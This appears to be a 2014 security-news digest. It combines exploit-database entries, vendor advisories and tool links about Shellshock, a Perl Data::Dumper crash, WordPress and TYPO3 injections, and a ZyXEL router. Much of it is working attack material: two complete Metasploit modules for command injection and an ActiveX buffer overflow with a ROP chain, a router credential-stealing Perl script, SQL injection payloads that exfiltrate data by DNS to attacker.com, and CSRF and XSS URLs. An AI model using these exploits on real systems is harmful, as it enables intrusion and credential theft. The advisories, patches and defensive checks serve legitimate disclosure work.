GNU bash Environment Variable Command Injection

Exploit Database Note:
The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test


Authored by Stephane Chazelas
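As an added example (not part of the Exploit Database note or the Red Hat article), the same probe run from Perl against every bash binary on a host; the candidate paths are assumptions. The point it makes is that the child inherits the function definition through the exported environment, so any program that spawns bash, not just an interactive shell, is a carrier, and the list-form open below makes sure no intermediate /bin/sh sees the probe first:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Candidate interpreters. /bin/sh is included because on some systems it is
# a symlink to bash. These paths are assumptions; adjust them for your host.
my @candidates = @ARGV ? @ARGV : qw(/bin/bash /usr/bin/bash /usr/local/bin/bash /bin/sh);

# Run a command without an intermediate /bin/sh (list-form open), so the
# only shell that receives our environment is the one under test.
sub run_capture {
    my @cmd = @_;
    open(my $fh, '-|', @cmd) or return '';
    local $/;                      # slurp the whole output
    my $out = <$fh>;
    close $fh;
    return defined $out ? $out : '';
}

# True if the binary identifies itself as GNU bash (not dash, ksh, ...).
sub is_bash {
    my ($path) = @_;
    return 0 unless -x $path;
    return run_capture($path, '--version') =~ /GNU bash/ ? 1 : 0;
}

# Returns 'vulnerable', 'not vulnerable' or 'not bash'.
sub shellshock_status {
    my ($path) = @_;
    return 'not bash' unless is_bash($path);
    # Same probe as the article: a function definition followed by trailing
    # code. The child picks it up from %ENV, which is the whole flaw.
    local $ENV{x} = '() { :;}; echo vulnerable';
    my $out = run_capture($path, '-c', 'echo this is a test');
    return $out =~ /^vulnerable$/m ? 'vulnerable' : 'not vulnerable';
}

for my $path (@candidates) {
    printf "%-24s %s\n", $path, shellshock_status($path);
}
```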



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: EMC AlphaStor Device Manager Opcode 0x75 Command Injection

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
      'Description'     => %q{
        This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
        command, the process does not properly filter user supplied input allowing for arbitrary
        command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
        with Windows 2003 SP2 and Windows 2008 R2.
      },
      'Author'          =>
        [
          'Anyway <Aniway.Anyway[at]gmail.com>',               # Vulnerability Discovery
          'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
          'Mohsan Farid <faridms[at]gmail.com>',               # msf module
          'Brent Morris <inkrypto[at]gmail.com>',              # msf module
          'juan vazquez'                                       # convert aux module into exploit
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['CVE', '2013-0928'],
          ['ZDI', '13-033']
        ],
      'Platform'        => 'win',
      'Arch'            => ARCH_X86,
      'Payload'         =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Targets'  =>
          [
            [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
          ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Jan 18 2013'))

    register_options(
      [
        Opt::RPORT(3000)
      ], self.class )
  end

  def check
    packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
    res = send_packet(packet)
    if res && res =~ /Could not fork command/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    execute_cmdstager({ :linemax => 487 })
  end

  def execute_command(cmd, opts)
    padding = rand_text_alpha_upper(489 - cmd.length)
    packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
    connect
    sock.put(packet)
    begin
      sock.get_once
    rescue EOFError
      fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
    end
    disconnect
  end

  def execute_cmdstager_begin(opts)
    if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
      cmd_list.each do |cmd|
        cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
      end
    end
  end

  def send_packet(packet)
    connect

    sock.put(packet)
    begin
      meta_data = sock.get_once(8)
    rescue EOFError
      meta_data = nil
    end

    unless meta_data
      disconnect
      return nil
    end

    code, length = meta_data.unpack("N*")

    unless code == 1
      disconnect
      return nil
    end

    begin
      data = sock.get_once(length)
    rescue EOFError
      data = nil
    ensure
      disconnect
    end

    data
  end

end




Metasploit: Advantech WebAccess dvs.ocx GetColor Buffer Overflow

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability in Advantech WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
        7 SP1 with IE8 and IE 9.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions'      =>
        {
          'Retries'              => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'             =>
        {
          'Space'           => 1024,
          'DisableNops'     => true,
          'BadChars'        => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                               "\x83\xC0\x08"             + # add eax, byte 8
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
        },
      'Platform'            => 'win',
      'Arch'                => ARCH_X86,
      'Targets'             =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'       => 0,
      'DisclosureDate'      => 'Jul 17 2014'))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")

    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS

    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end

  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61) # offset
    xpl << [0x60014185].pack("V")    # RET
    xpl << rand_text_alphanumeric(8)

    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V") # POP EBP # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end
    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V") # POP EBP # RETN
    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V") # POP ESI # RETN
    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
    # ESP = lpAddress (automatic)
    # PUSHAD # RETN
    xpl << [0x60018399].pack("V") # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
    xpl << code

    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping

    xpl
  end

end





Quick notes about the bash bug, its impact, and the fixes so far

We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise, especially earlier in the day.
Let's start with the nature of the bug. At its core, the problem is caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables.

More here: http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html

And more on the bug here: http://garage4hackers.com/entry.php?b=3087

LSE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE - Deep Recursion Stack Overflow

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-06-10 ===

Perl CORE - Deep Recursion Stack Overflow
-----------------------------------------

Affected Versions
=================
Perl v5.20.1 and below


Issue Overview
==============
Vulnerability Type: Stack Overflow
Technical Risk: high
Likelihood of Exploitation: low
Vendor: Perl
Vendor URL: http://www.perl.org
Credits: LSE Leading Security Experts GmbH employee Markus Vervier
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-06-10.txt
Advisory Status: Public
CVE-Number: CVE-2014-4330
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4330


Impact
======
When the runtime stack grows beyond its maximum size, a guard page is hit on
most modern operating systems, causing the Perl interpreter to crash.
Depending on the context, code execution might be possible on some
architectures if certain conditions are met.


Issue Description
=================
During internal development a stack overflow was discovered when serializing
data via the Data::Dumper extension, which is part of the Perl core.
By calling the "Dumper" method on a large array reference which recursively
contains other array references, it is possible to cause many recursive
calls to the DD_dump native function and ultimately exhaust all available stack
memory.


Temporary Workaround and Fix
============================
Applications written in Perl should ensure that a sanity check on data
serialized by Data::Dumper is performed.

According to the vendor a patch is available and coordinated with downstream
vendors.


Proof of Concept
================
$ cat min.pl
use strict;
use Data::Dumper;

my $dumpme = [];
for (my $i = 0; $i < $ARGV[0]; $i++) {
        $dumpme = [$dumpme, "AAAAAAAA"];
}
print Dumper($dumpme);

$ gdb --args perl min.pl 20000
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/bin/perl...Reading symbols from
/usr/lib/debug/usr/bin/perl...done.
done.
(gdb) run
Starting program: /usr/bin/perl min.pl 20000
warning: no loadable sections found in added symbol-file system-supplied
DSO at
0x7ffff7ffa000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
_IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",
    ap=0x7fffff7ff6f0) at vfprintf.c:1328
1328    vfprintf.c: No such file or directory.

It was confirmed that the overflow can be triggered via the XML::Parser
extension when parsing and dumping specially crafted XML-Documents.
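The sanity check the advisory recommends, as an added example rather than code from LSE or the Perl project; the depth limit of 100 and the helper names are assumptions. The depth walk uses an explicit stack, so the guard itself cannot overflow the C stack the way DD_dump does on the min.pl structure:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;
use Scalar::Util qw(reftype refaddr);

# Deepest level of reference nesting below $root (0 for a plain scalar).
# Blessed objects are walked by their underlying type; cycles are skipped.
sub ref_depth {
    my ($root) = @_;
    my ($max, %seen) = (0);
    my @stack = ([$root, 0]);
    while (my $item = pop @stack) {
        my ($node, $depth) = @$item;
        $max = $depth if $depth > $max;
        next unless ref $node;
        next if $seen{refaddr $node}++;    # cyclic structures terminate
        my $type = reftype $node;
        if ($type eq 'ARRAY') {
            push @stack, [$_, $depth + 1] for @$node;
        } elsif ($type eq 'HASH') {
            push @stack, [$_, $depth + 1] for values %$node;
        } elsif ($type eq 'REF' || $type eq 'SCALAR') {
            push @stack, [$$node, $depth + 1];
        }
        # CODE, GLOB and other reference types are treated as leaves
    }
    return $max;
}

# Serialise $data only if its nesting stays within $limit levels.
# The default of 100 is a hypothetical cap; size it for the data you expect.
sub safe_dump {
    my ($data, $limit) = @_;
    $limit = 100 unless defined $limit;
    my $depth = ref_depth($data);
    die "refusing to dump: nesting depth $depth exceeds limit $limit\n"
        if $depth > $limit;
    # Second line of defence: Data::Dumper's own cut-off for anything deeper.
    local $Data::Dumper::Maxdepth = $limit + 1;
    return Dumper($data);
}

# Rebuild the advisory's min.pl structure with $n nested array references.
sub nested {
    my ($n) = @_;
    my $d = [];
    $d = [$d, "AAAAAAAA"] for 1 .. $n;
    return $d;
}

print safe_dump(nested(5));            # shallow structure: dumped as usual
eval { safe_dump(nested(20000)) };      # the advisory's crash case: refused
print "blocked: $@" if $@;
```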


History
=======
2014-06-10 Issue discovery during internal development
2014-06-11 Vendor contacted
2014-06-11 Vendor reply
2014-06-13 CVE requested
2014-07-01 Vulnerability confirmed by vendor
2014-07-02 CVE-2014-4330 assigned
2014-09-25 Advisory released

GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc

SpoofMAC - Spoof your MAC address

For OS X, Windows, and Linux (most flavors)

I made this because changing your MAC address in Mac OS X is harder than it should be. The biggest annoyance is that the Wi-Fi card (Airport) needs to be manually disassociated from any connected networks in order for the change to be applied correctly. Doing this manually every time is tedious and lame.

Instead of doing that, just run this Python script and change your MAC address in one command. Now for Windows and Linux, too!

More here: https://github.com/feross/SpoofMAC

Ok, shit's real. It's in the wild.

First in-wild attack to hit my sensors - remote exploit vulnerability in bash, CVE-2014-6271.
Here: https://gist.github.com/anonymous/929d622f3b36b00c0be1

Two SQL Injections in All In One WP Security WordPress plugin

Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication: September 3, 2014 [without technical details]
Vendor Notification: September 3, 2014
Vendor Patch: September 12, 2014
Public Disclosure: September 24, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in the All In One WP Security WordPress plugin, which can be exploited to perform SQL injection attacks. Both vulnerabilities require administrative privileges, but they can also be exploited by a non-authenticated attacker via a CSRF vector.

1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242

1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on the DNS exfiltration technique and may be used to demonstrate the vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request asking for the IP address of the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain whose DNS server is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on the DNS exfiltration technique and may be used to demonstrate the vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request asking for the IP address of the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain whose DNS server is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:

<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">

-----------------------------------------------------------------------------------------------

Solution:

Update to All In One WP Security 3.8.3

More Information:
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

ZyXEL Prestig P-660HNU-T1v2 Credential Disclosure

#!/usr/bin/perl
# Exploit Author: Sebastián Magof
# Hardware: ZyXEL Prestig P-660HNU-T1
# Vulnerable file: wzADSL.asp
# location: http://gateway/cgi-bin/wzADSL.asp
# Bug: ISP usr+pwd disclosure
# Type: Local
# Date: 22/09/2014
# Vendor Homepage: http://www.zyxel.com/
# Version: 2.00(AAIJ.1)
# Tested on: Linux Fedora 20/Windows 7
# (\/)
# (**) Alpha (:
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n************************************************************\n";
print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd     *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)
print "************************************************************\n\n";#in other countries modify $url line 25


#isp pwd disclosure file
my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
 

#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");
 

#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
#ISP usr+pwd Arnet Telecom Argentina;
print "User: $usr\n";
print "Password: $pwd\n\n";
exit(0);



__EOF__




Paper: Malware Propagation in Large-Scale Networks

Abstract—Malware is pervasive in networks, and poses a critical threat to network security. However, we have very limited understanding of malware behavior in networks to date. In this paper, we investigate how malware propagates in networks from a global perspective. We formulate the problem, and establish a rigorous two-layer epidemic model for malware propagation from network to network. Based on the proposed model, our analysis indicates that the distribution of a given malware follows an exponential distribution, a power law distribution with a short exponential tail, and a power law distribution at its early, late and final stages, respectively. Extensive experiments have been performed through two real-world global-scale malware data sets, and the results confirm our theoretical findings.

More here: http://faculty.cse.tamu.edu/guofei/paper/MalSize-TKDE14.pdf

HAKA Runtime

What is HAKA

Haka is a collection of tools that allows capturing TCP/IP packets and filtering them based on Lua policy files.


More here: https://github.com/haka-security/haka

shellshock-hunter

Search Bing and concurrently test each result for vulnerability to CVE-2014-6271, the remote code execution bug in bash otherwise known as Shellshock.


More here: https://github.com/DanMcInerney/shellshock-hunter

MSA-2014-02: Typo3 Extension dmmjobcontrol Multiple Vulnerabilities (typo3-ext-sa-2014-012)

Mogwai Security Advisory MSA-2014-02
----------------------------------------------------------------------
Title:              JobControl (dmmjobcontrol) Multiple Vulnerabilities
Product:            dmmjobcontrol (Typo3 Extension)
Affected versions:  2.14.0
Impact:             high
Remote:             yes
Product link:       http://typo3.org/extensions/repository/view/dmmjobcontrol
Reported:           05/09/2014
by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)


Vendor's Description of the Software:
----------------------------------------------------------------------
JobControl (dmmjobcontrol) is a TYPO3 extension for showing jobs
("vacancies") on your website. It provides a list- and detail view and
the ability to search and apply for jobs. It can even make RSS feeds of
your joblist.

It works with html templates so it's easy to configure how the extension
will look for your site. The list can be shown as a "paginated list",
including a page-browser. The extension itself is multi-lingual, at this
moment English, Danish, Polish, German, Russian and Dutch are included.
The best feature however is that multi-lingual jobs are fully supported
too, so you can provide a translation for a job if you have a multi-lingual
site.

JobControl uses MM-relation tables for regions, branches, sectors etc.
This means that for every new site, you can make a new list of branches to
use. They are not hardcoded and don't require any TypoScript to set up.

JobControl is very easy to set up, with good default templates that can
be styled to your needs using css stylesheets. It's very powerful and
flexible too with lots of configuration options for advanced users.


Business recommendation:
----------------------------------------------------------------------
According to the Typo3 Security Team the extension maintainer no longer
maintains the extension and is therefore not providing an update.

Exploitation can be prevented with the workaround below. However, the
extension should be replaced with a maintained alternative.

Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
dmmjobcontrol provides a search function for the job database. Several
input fields (for example education, region, sector) are used without
proper sanitization to create the SELECT statement of the search query.

2) Reflected Cross Site Scripting (XSS)
The value of the "keyword" parameter is used without any sanitization
to create the html response of the search request. This can be abused
to inject malicious HTML/JavaScript code into the HTML response.


Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
The following PoC shows a blind SQL injection via the sector parameter; other
parameters are also vulnerable:
http://xxxx/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20

2) Reflected Cross Site Scripting (XSS)
http://172.16.37.232/typo3/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bkeyword%5D=">

Vulnerable / tested versions:
----------------------------------------------------------------------
dmmjobcontrol 2.14.0


Disclosure timeline:
----------------------------------------------------------------------
05/09/2014: Reporting to the Typo3 Security team
05/09/2014: Response from Typo3 Security team that they received the mail
24/09/2014: Mail to Typo3 Security team, asking for the current status
25/09/2014: Response from Typo3 Security Team that they released an advisory[1]
25/09/2014: Release of public advisory


Workaround (use on your own responsibility):
----------------------------------------------------------------------
In the file:
typo3conf/ext/dmmjobcontrol/pi1/class.tx_dmmjobcontrol_pi1.php

To fix the Cross Site Scripting (XSS) vulnerability, replace line 112 with the
following PHP code:

$markerArray['###KEYWORD_VALUE###'] = htmlspecialchars($session['search']['keyword'], ENT_QUOTES);

To fix the SQL Injection vulnerability, replace line 257 with the following
PHP code ($value is submitted as an array, e.g. search[sector][], so every
element is cast individually; intval() applied to the whole array would not
yield a sanitised list):

$whereAdd[] = $table.'.uid_local=tx_dmmjobcontrol_job.uid AND ('
    .$table.'.uid_foreign='
    .implode(' OR '.$table.'.uid_foreign=', array_map('intval', (array) $value))
    .')';


References:
----------------------------------------------------------------------
[1] TYPO3-EXT-SA-2014-012: Several vulnerabilities in extension JobControl
(dmmjobcontrol)
http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-012

Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab


----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)

Tel. +49 731 205 89 0
Fax +49 731 205 89 29
info@mogwaisecurity.de

A guide to RegRipper and the art of timeline building

I have often heard RegRipper mentioned on forums and websites and how it was supposed to make examining event logs, registry files and other similar files a breeze. RegRipper is developed and maintained by Harlan Carvey, who is the author of several blogs, numerous books and tools, and is also very active in the forensic community in general.

RegRipper is a tool that can be used to quickly extract values of interest from within the registry. It is NOT a registry browser. You do not get the option to browse through the registry. That can quickly overwhelm any analyst.

Instead it extracts only values of potential interest and presents them in a report for easier reading.


more here...........http://articles.forensicfocus.com/2014/09/25/a-guide-to-regripper-and-the-art-of-timeline-building/

National Express print-at-home vulnerability

